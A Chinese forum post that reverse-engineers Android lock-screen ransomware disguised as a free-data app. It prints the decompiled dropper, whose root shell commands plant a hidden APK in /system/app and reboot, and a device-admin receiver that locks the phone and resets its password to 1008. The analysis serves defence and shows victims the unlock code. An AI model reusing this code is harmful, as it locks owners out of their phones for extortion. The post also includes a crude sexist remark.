对锁机APP"小丹一键免流"的逆向分析

wnagzihxain

刚刚有同学求助，专业收集APP20年，所以下了样本来分析一下

Jeb打开结果崩了，不明原因，难道是反Jeb？？？

Jeb不能用了那就上jdgui吧

有三个class文件，c是MainActivity，来看看代码

有经验的老司机可以一下子就看出来这是在把apk里带的ijm-x86.so弄成zihao.l文件，这里其实是一个伪造爱加密加固的假象

[Java] 纯文本查看 复制代码

?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96

package com.qqmagic;    import adrt.ADRTLogCatReader; import android.app.Activity; import android.content.res.AssetManager; import android.os.Bundle; import android.os.Environment; import android.view.View; import android.view.View.OnClickListener; import android.widget.Button; import android.widget.EditText; import java.io.File; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream;    public class c   extends Activity {   private Button b;   a del = new a();   String file = this.path + "/zihao.l";   String path = g();   private EditText t;      private void d(String paramString)     throws IOException   {     FileOutputStream localFileOutputStream = new FileOutputStream(paramString);     paramString = getAssets().open("ijm-x86.so");     byte[] arrayOfByte = new byte['?'];     for (int i = paramString.read(arrayOfByte);; i = paramString.read(arrayOfByte))     {       if (i <= 0)       {         localFileOutputStream.flush();         paramString.close();         localFileOutputStream.close();         return;       }       localFileOutputStream.write(arrayOfByte, 0, i);     }   }      public final String g()   {     String str = (String)null;     if (Environment.getExternalStorageState().equals("mounted")) {       str = Environment.getExternalStorageDirectory().getAbsolutePath();     }     return str;   }      @Override   protected void onCreate(Bundle paramBundle)   {     ADRTLogCatReader.onContext(this, "com.aide.ui");     super.onCreate(paramBundle);     setContentView(2130903040);     this.b = ((Button)findViewById(2131099648));     this.t = ((EditText)findViewById(R.id.mainEditText1));     this.b.setOnClickListener(new ButtonClickListener());     try     {       paramBundle = new java/lang/StringBuffer;       paramBundle.<init>();       d(this.path + "/zihao.l");       return;     }     catch (IOException paramBundle)     {       for (;;) {}     }   }      @Override   protected void onDestroy()   {     a.deleteFile(this.file);     super.onDestroy();   }      private final class ButtonClickListener     implements View.OnClickListener   {     public ButtonClickListener() {}          @Override     public void onClick(View paramView)     {       new b().rootShell();       a.deleteFile(c.this.file);     }   } }

切到b.class

[Java] 纯文本查看 复制代码

?

001 002 003 004 005 006 007 008 009 010 011 012 013 014 015 016 017 018 019 020 021 022 023 024 025 026 027 028 029 030 031 032 033 034 035 036 037 038 039 040 041 042 043 044 045 046 047 048 049 050 051 052 053 054 055 056 057 058 059 060 061 062 063 064 065 066 067 068 069 070 071 072 073 074 075 076 077 078 079 080 081 082 083 084 085 086 087 088 089 090 091 092 093 094 095 096 097 098 099 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825

package com.qqmagic;    import java.util.List;    public class b {   public static final String COMMAND_EXIT = "exit\n";   public static final String COMMAND_LINE_END = "\n";   public static final String COMMAND_SH = "sh";   public static final String COMMAND_SU = "su";      public static boolean checkRootPermission()   {     boolean bool = false;     if (execCommand("echo root", true, false).result != 0) {}     for (;;)     {       return bool;       bool = true;     }   }      public static CommandResult execCommand(String paramString, boolean paramBoolean)   {     return execCommand(new String[] { paramString }, paramBoolean, true);   }      public static CommandResult execCommand(String paramString, boolean paramBoolean1, boolean paramBoolean2)   {     return execCommand(new String[] { paramString }, paramBoolean1, paramBoolean2);   }      public static CommandResult execCommand(List<String> paramList, boolean paramBoolean)   {     if (paramList == null) {}     for (paramList = (String[])null;; paramList = (String[])paramList.toArray(new String[0])) {       return execCommand(paramList, paramBoolean, true);     }   }      public static CommandResult execCommand(List<String> paramList, boolean paramBoolean1, boolean paramBoolean2)   {     if (paramList == null) {}     for (paramList = (String[])null;; paramList = (String[])paramList.toArray(new String[0])) {       return execCommand(paramList, paramBoolean1, paramBoolean2);     }   }      public static CommandResult execCommand(String[] paramArrayOfString, boolean paramBoolean)   {     return execCommand(paramArrayOfString, paramBoolean, true);   }      /* Error */   public static CommandResult execCommand(String[] paramArrayOfString, boolean paramBoolean1, boolean paramBoolean2)   {     // Byte code:     //   0: iconst_m1     //   1: istore_3     //   2: aload_0     //   3: ifnull +8 -> 11     //   6: aload_0     //   7: arraylength     //   8: ifne +22 -> 30     //   11: new 6    com/qqmagic/b$CommandResult     //   14: dup     //   15: iconst_m1     //   16: aconst_null     //   17: checkcast 40 java/lang/String     //   20: aconst_null     //   21: checkcast 40 java/lang/String     //   24: invokespecial 64 com/qqmagic/b$CommandResult:<init>    (ILjava/lang/String;Ljava/lang/String;)V     //   27: astore_0     //   28: aload_0     //   29: areturn     //   30: aconst_null     //   31: checkcast 66 java/lang/Process     //   34: astore 7     //   36: aconst_null     //   37: checkcast 68 java/io/BufferedReader     //   40: astore 12     //   42: aconst_null     //   43: checkcast 68 java/io/BufferedReader     //   46: astore 11     //   48: aconst_null     //   49: checkcast 70 java/lang/StringBuilder     //   52: astore 15     //   54: aconst_null     //   55: checkcast 70 java/lang/StringBuilder     //   58: astore 13     //   60: aconst_null     //   61: checkcast 72 java/io/DataOutputStream     //   64: astore 10     //   66: invokestatic 78  java/lang/Runtime:getRuntime  ()Ljava/lang/Runtime;     //   69: astore 9     //   71: iload_1     //   72: ifeq +517 -> 589     //   75: ldc 20     //   77: astore 8     //   79: aload 9     //   81: aload 8     //   83: invokevirtual 82 java/lang/Runtime:exec   (Ljava/lang/String;)Ljava/lang/Process;     //   86: astore 8     //   88: aload 8     //   90: astore 7     //   92: new 72   java/io/DataOutputStream     //   95: astore 8     //   97: aload 8     //   99: aload 7     //   101: invokevirtual 86 java/lang/Process:getOutputStream ()Ljava/io/OutputStream;     //   104: invokespecial 89 java/io/DataOutputStream:<init>   (Ljava/io/OutputStream;)V     //   107: iconst_0     //   108: istore 6     //   110: iload_3     //   111: istore 4     //   113: aload 12     //   115: astore 14     //   117: aload 11     //   119: astore 16     //   121: aload 8     //   123: astore 17     //   125: aload 7     //   127: astore 18     //   129: iload_3     //   130: istore 5     //   132: iload 6     //   134: aload_0     //   135: arraylength     //   136: if_icmplt +460 -> 596     //   139: iload_3     //   140: istore 4     //   142: aload 12     //   144: astore 14     //   146: aload 11     //   148: astore 16     //   150: aload 8     //   152: astore 17     //   154: aload 7     //   156: astore 18     //   158: iload_3     //   159: istore 5     //   161: aload 8     //   163: ldc 11     //   165: invokevirtual 93 java/io/DataOutputStream:writeBytes   (Ljava/lang/String;)V     //   168: iload_3     //   169: istore 4     //   171: aload 12     //   173: astore 14     //   175: aload 11     //   177: astore 16     //   179: aload 8     //   181: astore 17     //   183: aload 7     //   185: astore 18     //   187: iload_3     //   188: istore 5     //   190: aload 8     //   192: invokevirtual 96 java/io/DataOutputStream:flush    ()V     //   195: iload_3     //   196: istore 4     //   198: aload 12     //   200: astore 14     //   202: aload 11     //   204: astore 16     //   206: aload 8     //   208: astore 17     //   210: aload 7     //   212: astore 18     //   214: iload_3     //   215: istore 5     //   217: aload 7     //   219: invokevirtual 100   java/lang/Process:waitFor ()I     //   222: istore_3     //   223: aload 12     //   225: astore_0     //   226: aload 11     //   228: astore 14     //   230: aload 15     //   232: astore 9     //   234: aload 13     //   236: astore 10     //   238: aload 8     //   240: astore 16     //   242: aload 7     //   244: astore 17     //   246: iload_3     //   247: istore 4     //   249: iload_2     //   250: ifeq +264 -> 514     //   253: iload_3     //   254: istore 4     //   256: aload 12     //   258: astore 14     //   260: aload 11     //   262: astore 16     //   264: aload 8     //   266: astore 17     //   268: aload 7     //   270: astore 18     //   272: iload_3     //   273: istore 5     //   275: new 70  java/lang/StringBuilder     //   278: astore_0     //   279: iload_3     //   280: istore 4     //   282: aload 12     //   284: astore 14     //   286: aload 11     //   288: astore 16     //   290: aload 8     //   292: astore 17     //   294: aload 7     //   296: astore 18     //   298: iload_3     //   299: istore 5     //   301: aload_0     //   302: invokespecial 101   java/lang/StringBuilder:<init>    ()V     //   305: aload 12     //   307: astore 14     //   309: aload 11     //   311: astore 16     //   313: aload 8     //   315: astore 17     //   317: aload 7     //   319: astore 18     //   321: new 70  java/lang/StringBuilder     //   324: astore 10     //   326: aload 12     //   328: astore 14     //   330: aload 11     //   332: astore 16     //   334: aload 8     //   336: astore 17     //   338: aload 7     //   340: astore 18     //   342: aload 10     //   344: invokespecial 101   java/lang/StringBuilder:<init>    ()V     //   347: aload 12     //   349: astore 14     //   351: aload 11     //   353: astore 16     //   355: aload 8     //   357: astore 17     //   359: aload 7     //   361: astore 18     //   363: new 68  java/io/BufferedReader     //   366: astore 9     //   368: aload 12     //   370: astore 14     //   372: aload 11     //   374: astore 16     //   376: aload 8     //   378: astore 17     //   380: aload 7     //   382: astore 18     //   384: new 103 java/io/InputStreamReader     //   387: astore 13     //   389: aload 12     //   391: astore 14     //   393: aload 11     //   395: astore 16     //   397: aload 8     //   399: astore 17     //   401: aload 7     //   403: astore 18     //   405: aload 13     //   407: aload 7     //   409: invokevirtual 107   java/lang/Process:getInputStream  ()Ljava/io/InputStream;     //   412: invokespecial 110   java/io/InputStreamReader:<init>  (Ljava/io/InputStream;)V     //   415: aload 12     //   417: astore 14     //   419: aload 11     //   421: astore 16     //   423: aload 8     //   425: astore 17     //   427: aload 7     //   429: astore 18     //   431: aload 9     //   433: aload 13     //   435: invokespecial 113   java/io/BufferedReader:<init> (Ljava/io/Reader;)V     //   438: new 68  java/io/BufferedReader     //   441: astore 12     //   443: new 103 java/io/InputStreamReader     //   446: astore 13     //   448: aload 13     //   450: aload 7     //   452: invokevirtual 116   java/lang/Process:getErrorStream  ()Ljava/io/InputStream;     //   455: invokespecial 110   java/io/InputStreamReader:<init>  (Ljava/io/InputStream;)V     //   458: aload 12     //   460: aload 13     //   462: invokespecial 113   java/io/BufferedReader:<init> (Ljava/io/Reader;)V     //   465: aload 9     //   467: invokevirtual 120   java/io/BufferedReader:readLine   ()Ljava/lang/String;     //   470: astore 11     //   472: aload 11     //   474: ifnonnull +279 -> 753     //   477: aload 12     //   479: invokevirtual 120   java/io/BufferedReader:readLine   ()Ljava/lang/String;     //   482: astore 11     //   484: aload 11     //   486: ifnonnull +314 -> 800     //   489: aload 9     //   491: astore 11     //   493: iload_3     //   494: istore 4     //   496: aload 7     //   498: astore 17     //   500: aload 8     //   502: astore 16     //   504: aload_0     //   505: astore 9     //   507: aload 12     //   509: astore 14     //   511: aload 11     //   513: astore_0     //   514: aload 16     //   516: ifnull +8 -> 524     //   519: aload 16     //   521: invokevirtual 123   java/io/DataOutputStream:close    ()V     //   524: aload_0     //   525: ifnull +7 -> 532     //   528: aload_0     //   529: invokevirtual 124   java/io/BufferedReader:close  ()V     //   532: aload 14     //   534: ifnull +8 -> 542     //   537: aload 14     //   539: invokevirtual 124   java/io/BufferedReader:close  ()V     //   542: aload 17     //   544: ifnull +8 -> 552     //   547: aload 17     //   549: invokevirtual 127   java/lang/Process:destroy ()V     //   552: aload 9     //   554: ifnonnull +391 -> 945     //   557: aconst_null     //   558: checkcast 40 java/lang/String     //   561: astore_0     //   562: aload 10     //   564: ifnonnull +390 -> 954     //   567: aconst_null     //   568: checkcast 40 java/lang/String     //   571: astore 7     //   573: new 6   com/qqmagic/b$CommandResult     //   576: dup     //   577: iload 4     //   579: aload_0     //   580: aload 7     //   582: invokespecial 64 com/qqmagic/b$CommandResult:<init>    (ILjava/lang/String;Ljava/lang/String;)V     //   585: astore_0     //   586: goto -558 -> 28     //   589: ldc 17     //   591: astore 8     //   593: goto -514 -> 79     //   596: aload_0     //   597: iload 6     //   599: aaload     //   600: astore 9     //   602: aload 9     //   604: ifnonnull +9 -> 613     //   607: iinc 6 1     //   610: goto -500 -> 110     //   613: iload_3     //   614: istore 4     //   616: aload 12     //   618: astore 14     //   620: aload 11     //   622: astore 16     //   624: aload 8     //   626: astore 17     //   628: aload 7     //   630: astore 18     //   632: iload_3     //   633: istore 5     //   635: aload 8     //   637: aload 9     //   639: invokevirtual 131   java/lang/String:getBytes ()[B     //   642: invokevirtual 135   java/io/DataOutputStream:write    ([B)V     //   645: iload_3     //   646: istore 4     //   648: aload 12     //   650: astore 14     //   652: aload 11     //   654: astore 16     //   656: aload 8     //   658: astore 17     //   660: aload 7     //   662: astore 18     //   664: iload_3     //   665: istore 5     //   667: aload 8     //   669: ldc 14     //   671: invokevirtual 93 java/io/DataOutputStream:writeBytes   (Ljava/lang/String;)V     //   674: iload_3     //   675: istore 4     //   677: aload 12     //   679: astore 14     //   681: aload 11     //   683: astore 16     //   685: aload 8     //   687: astore 17     //   689: aload 7     //   691: astore 18     //   693: iload_3     //   694: istore 5     //   696: aload 8     //   698: invokevirtual 96 java/io/DataOutputStream:flush    ()V     //   701: goto -94 -> 607     //   704: astore 10     //   706: aload 7     //   708: astore_0     //   709: iload 4     //   711: istore_3     //   712: aload 8     //   714: astore 7     //   716: aload 15     //   718: astore 9     //   720: aload 10     //   722: astore 8     //   724: aload 8     //   726: invokevirtual 138   java/io/IOException:printStackTrace   ()V     //   729: aload_0     //   730: astore 17     //   732: aload 12     //   734: astore_0     //   735: aload 11     //   737: astore 14     //   739: aload 13     //   741: astore 10     //   743: aload 7     //   745: astore 16     //   747: iload_3     //   748: istore 4     //   750: goto -236 -> 514     //   753: aload_0     //   754: aload 11     //   756: invokevirtual 142   java/lang/StringBuilder:append    (Ljava/lang/String;)Ljava/lang/StringBuilder;     //   759: pop     //   760: goto -295 -> 465     //   763: astore 13     //   765: aload 12     //   767: astore 11     //   769: aload 9     //   771: astore 12     //   773: aload_0     //   774: astore 9     //   776: aload 8     //   778: astore_0     //   779: aload 7     //   781: astore 14     //   783: aload 13     //   785: astore 8     //   787: aload 10     //   789: astore 13     //   791: aload_0     //   792: astore 7     //   794: aload 14     //   796: astore_0     //   797: goto -73 -> 724     //   800: aload 10     //   802: aload 11     //   804: invokevirtual 142   java/lang/StringBuilder:append    (Ljava/lang/String;)Ljava/lang/StringBuilder;     //   807: pop     //   808: goto -331 -> 477     //   811: astore 13     //   813: aload 12     //   815: astore 11     //   817: aload 9     //   819: astore 12     //   821: aload_0     //   822: astore 9     //   824: aload 13     //   826: astore_0     //   827: aload 12     //   829: astore 14     //   831: aload 11     //   833: astore 16     //   835: aload 8     //   837: astore 17     //   839: aload 7     //   841: astore 18     //   843: aload_0     //   844: invokevirtual 143   java/lang/Exception:printStackTrace   ()V     //   847: aload 12     //   849: astore_0     //   850: aload 11     //   852: astore 14     //   854: aload 8     //   856: astore 16     //   858: aload 7     //   860: astore 17     //   862: iload_3     //   863: istore 4     //   865: goto -351 -> 514     //   868: astore_0     //   869: aload 18     //   871: astore 7     //   873: aload 17     //   875: astore 8     //   877: aload 16     //   879: astore 11     //   881: aload 14     //   883: astore 12     //   885: aload 8     //   887: ifnull +8 -> 895     //   890: aload 8     //   892: invokevirtual 123   java/io/DataOutputStream:close    ()V     //   895: aload 12     //   897: ifnull +8 -> 905     //   900: aload 12     //   902: invokevirtual 124   java/io/BufferedReader:close  ()V     //   905: aload 11     //   907: ifnull +8 -> 915     //   910: aload 11     //   912: invokevirtual 124   java/io/BufferedReader:close  ()V     //   915: aload 7     //   917: ifnull +8 -> 925     //   920: aload 7     //   922: invokevirtual 127   java/lang/Process:destroy ()V     //   925: aload_0     //   926: athrow     //   927: astore 8     //   929: aload 8     //   931: invokevirtual 138   java/io/IOException:printStackTrace   ()V     //   934: goto -19 -> 915     //   937: astore_0     //   938: aload_0     //   939: invokevirtual 138   java/io/IOException:printStackTrace   ()V     //   942: goto -400 -> 542     //   945: aload 9     //   947: invokevirtual 146   java/lang/StringBuilder:toString  ()Ljava/lang/String;     //   950: astore_0     //   951: goto -389 -> 562     //   954: aload 10     //   956: invokevirtual 146   java/lang/StringBuilder:toString  ()Ljava/lang/String;     //   959: astore 7     //   961: goto -388 -> 573     //   964: astore_0     //   965: aload 10     //   967: astore 8     //   969: goto -84 -> 885     //   972: astore_0     //   973: aload 10     //   975: astore 8     //   977: goto -92 -> 885     //   980: astore_0     //   981: aload 9     //   983: astore 12     //   985: goto -100 -> 885     //   988: astore_0     //   989: aload 12     //   991: astore 11     //   993: aload 9     //   995: astore 12     //   997: goto -112 -> 885     //   1000: astore 8     //   1002: aload_0     //   1003: astore 9     //   1005: aload 8     //   1007: astore_0     //   1008: aload 7     //   1010: astore 8     //   1012: aload 9     //   1014: astore 7     //   1016: goto -131 -> 885     //   1019: astore_0     //   1020: aload 10     //   1022: astore 8     //   1024: aload 15     //   1026: astore 9     //   1028: aload 13     //   1030: astore 10     //   1032: goto -205 -> 827     //   1035: astore_0     //   1036: aload 10     //   1038: astore 8     //   1040: aload 15     //   1042: astore 9     //   1044: aload 13     //   1046: astore 10     //   1048: goto -221 -> 827     //   1051: astore_0     //   1052: aload 15     //   1054: astore 9     //   1056: aload 13     //   1058: astore 10     //   1060: iload 5     //   1062: istore_3     //   1063: goto -236 -> 827     //   1066: astore 10     //   1068: aload_0     //   1069: astore 9     //   1071: aload 10     //   1073: astore_0     //   1074: aload 13     //   1076: astore 10     //   1078: goto -251 -> 827     //   1081: astore 13     //   1083: aload_0     //   1084: astore 9     //   1086: aload 13     //   1088: astore_0     //   1089: goto -262 -> 827     //   1092: astore 13     //   1094: aload 9     //   1096: astore 12     //   1098: aload_0     //   1099: astore 9     //   1101: aload 13     //   1103: astore_0     //   1104: goto -277 -> 827     //   1107: astore 8     //   1109: iconst_m1     //   1110: istore_3     //   1111: aload 7     //   1113: astore_0     //   1114: aload 15     //   1116: astore 9     //   1118: aload 10     //   1120: astore 7     //   1122: goto -398 -> 724     //   1125: astore 8     //   1127: aload 7     //   1129: astore_0     //   1130: iconst_m1     //   1131: istore_3     //   1132: aload 15     //   1134: astore 9     //   1136: aload 10     //   1138: astore 7     //   1140: goto -416 -> 724     //   1143: astore 14     //   1145: aload_0     //   1146: astore 9     //   1148: aload 8     //   1150: astore_0     //   1151: aload 7     //   1153: astore 10     //   1155: aload 14     //   1157: astore 8     //   1159: aload_0     //   1160: astore 7     //   1162: aload 10     //   1164: astore_0     //   1165: goto -441 -> 724     //   1168: astore 13     //   1170: aload_0     //   1171: astore 9     //   1173: aload 8     //   1175: astore_0     //   1176: aload 7     //   1178: astore 14     //   1180: aload 13     //   1182: astore 8     //   1184: aload 10     //   1186: astore 13     //   1188: aload_0     //   1189: astore 7     //   1191: aload 14     //   1193: astore_0     //   1194: goto -470 -> 724     //   1197: astore 12     //   1199: aload 9     //   1201: astore 13     //   1203: aload_0     //   1204: astore 9     //   1206: aload 8     //   1208: astore 14     //   1210: aload 7     //   1212: astore_0     //   1213: aload 12     //   1215: astore 8     //   1217: aload 13     //   1219: astore 12     //   1221: aload 10     //   1223: astore 13     //   1225: aload 14     //   1227: astore 7     //   1229: goto -505 -> 724     // Local variable table:     //   start   length  slot name signature     //   0   1232 0   paramArrayOfString   String[]     //   0   1232 1   paramBoolean1    boolean     //   0   1232 2   paramBoolean2    boolean     //   1   1131 3   i   int     //   111 753 4   j   int     //   130 931 5   k   int     //   108 500 6   m   int     //   34  1194 7   localObject1 Object     //   77  814 8   localObject2 Object     //   927 3   8   localIOException1    java.io.IOException     //   967 9   8   localObject3 Object     //   1000 6   8   localObject4 Object     //   1010 29  8   localObject5 Object     //   1107 1   8   localIOException2    java.io.IOException     //   1125 24  8   localIOException3    java.io.IOException     //   1157 59  8   localObject6 Object     //   69  1136 9   localObject7 Object     //   64  499 10  localObject8 Object     //   704 17  10  localIOException4    java.io.IOException     //   741 318 10  localObject9 Object     //   1066 6   10  localException1  Exception     //   1076 146 10  localObject10    Object     //   46  946 11  localObject11    Object     //   40  1057 12  localObject12    Object     //   1197 17  12  localIOException5    java.io.IOException     //   1219 1   12  localObject13    Object     //   58  682 13  localObject14    Object     //   763 21  13  localIOException6    java.io.IOException     //   789 1   13  localObject15    Object     //   811 264 13  localException2  Exception     //   1081 6   13  localException3  Exception     //   1092 10  13  localException4  Exception     //   1168 13  13  localIOException7    java.io.IOException     //   1186 38  13  localObject16    Object     //   115 767 14  localObject17    Object     //   1143 13  14  localIOException8    java.io.IOException     //   1178 48  14  localObject18    Object     //   52  1081 15  localStringBuilder   StringBuilder     //   119 759 16  localObject19    Object     //   123 751 17  localObject20    Object     //   127 743 18  localObject21    Object     // Exception table:     //   from to  target  type     //   132 139 704 java/io/IOException     //   161 168 704 java/io/IOException     //   190 195 704 java/io/IOException     //   217 223 704 java/io/IOException     //   275 279 704 java/io/IOException     //   301 305 704 java/io/IOException     //   635 645 704 java/io/IOException     //   667 674 704 java/io/IOException     //   696 701 704 java/io/IOException     //   465 472 763 java/io/IOException     //   477 484 763 java/io/IOException     //   753 760 763 java/io/IOException     //   800 808 763 java/io/IOException     //   465 472 811 java/lang/Exception     //   477 484 811 java/lang/Exception     //   753 760 811 java/lang/Exception     //   800 808 811 java/lang/Exception     //   132 139 868 finally     //   161 168 868 finally     //   190 195 868 finally     //   217 223 868 finally     //   275 279 868 finally     //   301 305 868 finally     //   321 326 868 finally     //   342 347 868 finally     //   363 368 868 finally     //   384 389 868 finally     //   405 415 868 finally     //   431 438 868 finally     //   635 645 868 finally     //   667 674 868 finally     //   696 701 868 finally     //   843 847 868 finally     //   890 895 927 java/io/IOException     //   900 905 927 java/io/IOException     //   910 915 927 java/io/IOException     //   519 524 937 java/io/IOException     //   528 532 937 java/io/IOException     //   537 542 937 java/io/IOException     //   66  71  964 finally     //   79  88  964 finally     //   92  107 972 finally     //   438 465 980 finally     //   465 472 988 finally     //   477 484 988 finally     //   753 760 988 finally     //   800 808 988 finally     //   724 729 1000 finally     //   66  71  1019 java/lang/Exception     //   79  88  1019 java/lang/Exception     //   92  107 1035 java/lang/Exception     //   132 139 1051 java/lang/Exception     //   161 168 1051 java/lang/Exception     //   190 195 1051 java/lang/Exception     //   217 223 1051 java/lang/Exception     //   275 279 1051 java/lang/Exception     //   301 305 1051 java/lang/Exception     //   635 645 1051 java/lang/Exception     //   667 674 1051 java/lang/Exception     //   696 701 1051 java/lang/Exception     //   321 326 1066 java/lang/Exception     //   342 347 1066 java/lang/Exception     //   363 368 1081 java/lang/Exception     //   384 389 1081 java/lang/Exception     //   405 415 1081 java/lang/Exception     //   431 438 1081 java/lang/Exception     //   438 465 1092 java/lang/Exception     //   66  71  1107 java/io/IOException     //   79  88  1107 java/io/IOException     //   92  107 1125 java/io/IOException     //   321 326 1143 java/io/IOException     //   342 347 1143 java/io/IOException     //   363 368 1168 java/io/IOException     //   384 389 1168 java/io/IOException     //   405 415 1168 java/io/IOException     //   431 438 1168 java/io/IOException     //   438 465 1197 java/io/IOException   }      void rootShell()   {     execCommand(new String[] { "mount -o rw,remount /system", "mount -o rw,remount /system/app", "cp /sdcard/zihao.l /system/app/", "chmod 777 /system/app/zihao.l", "mv /system/app/zihao.l /system/app/zihao.apk", "chmod 644 /system/app/zihao.apk", "reboot" }, true);   }      public static class CommandResult   {     public String errorMsg;     public int result;     public String successMsg;          public CommandResult(int paramInt)     {       this.result = paramInt;     }          public CommandResult(int paramInt, String paramString1, String paramString2)     {       this.result = paramInt;       this.successMsg = paramString1;       this.errorMsg = paramString2;     }   } }

有些地方反编译出错了，估计是击中了jdgui的bug了，但是没关系，关键代码还是可以看出来的

[Java] 纯文本查看 复制代码

?

1 2 3 4

void rootShell()   {     execCommand(new String[] { "mount -o rw,remount /system", "mount -o rw,remount /system/app", "cp /sdcard/zihao.l /system/app/", "chmod 777 /system/app/zihao.l", "mv /system/app/zihao.l /system/app/zihao.apk", "chmod 644 /system/app/zihao.apk", "reboot" }, true);   }

刚刚弄出了一个zihao.l，然后把这个文件弄到system/app目录下，命名为zihao.apk，这是系统app的目录，一般来说不能直接卸载，所以这是一个apk文件，而刚刚这个只有三个clsaa文件的apk只是一层壳

然后来解压这个apk

看assets文件夹的文件，看起来像是爱加密的加固，其实不是，现在的查壳工具有些是靠遍历apk文件的so文件来区别壳的，所以很容易迷惑

而ijm-x86.so就是真正的锁机apk

那我们现在来安装一下看看，安装完，进去点击一键开启免流，结果就卡住了，这里卡住是因为前面的命令里最后是reboot设备，加上我乱点了一下，那就强行结束好了

重启设备后发现被锁屏，这女的真丑，胸也小看到了一个解锁序列号：1383562，然后无法回到桌面，继续重启依旧是该界面

那我们就来分析一下这玩意

Jeb打开这个apk，变量名自己修改，这里就不讲了

找到入口，MainActivity里隐式意图开启了设备管理器的激活

[Java] 纯文本查看 复制代码

?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34

package com.h;    import adrt.ADRTLogCatReader; import android.app.Activity; import android.content.ComponentName; import android.content.Context; import android.content.Intent; import android.os.Bundle;    public class MainActivity extends Activity {     public MainActivity() {         super();     }        private void activiteDevice() {         Class class0;         Intent intent = new Intent("android.app.action.ADD_DEVICE_ADMIN");         try {             class0 = Class.forName("com.h.MyAdmin");         }         catch(ClassNotFoundException classNotFoundException) {             throw new NoClassDefFoundError(((Throwable)classNotFoundException).getMessage());         }            intent.putExtra("android.app.extra.DEVICE_ADMIN", new ComponentName(((Context)this), class0));         this.startActivityForResult(intent, 0);     }        @Override public void onCreate(Bundle bundle) {         ADRTLogCatReader.onContext(((Context)this), "com.aide.ui");         super.onCreate(bundle);         this.activiteDevice();     } }

设备管理器的操作一定会重写部分方法，过去看看

[Java] 纯文本查看 复制代码

?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54

package com.h;    import android.app.admin.DeviceAdminReceiver; import android.content.Context; import android.content.Intent; import android.util.Log;    public class MyAdmin extends DeviceAdminReceiver {     public MyAdmin() {         super();     }        @Override public CharSequence onDisableRequested(Context context, Intent intent) {         String string = Integer.toString(1008);         this.getManager(context).lockNow();         this.getManager(context).resetPassword(string, 0);         return super.onDisableRequested(context, intent);     }        @Override public void onEnabled(Context context, Intent intent) {         Class class0;         MyAdmin myAdmin = this;         Context context = context;         Intent intent = intent;         String string = Integer.toString(1008);         Intent intent = null;         Intent intent = null;         Context context = context;         try {             class0 = Class.forName("com.h.s");         }         catch(ClassNotFoundException classNotFoundException0) {             throw new NoClassDefFoundError(classNotFoundException0.getMessage());         }            super(context, class0);         intent.setFlags(268435456);         context.startService(intent);         myAdmin.getManager(context).resetPassword(string, 0);         super.onEnabled(context, intent);     }        @Override public void onPasswordChanged(Context context, Intent intent) {         String string = Integer.toString(1008);         this.getManager(context).lockNow();         this.getManager(context).resetPassword(string, 0);         super.onPasswordChanged(context, intent);     }        @Override public void onReceive(Context context, Intent intent) {         Log.i("------", "onReceive-----");         super.onReceive(context, intent);     } }

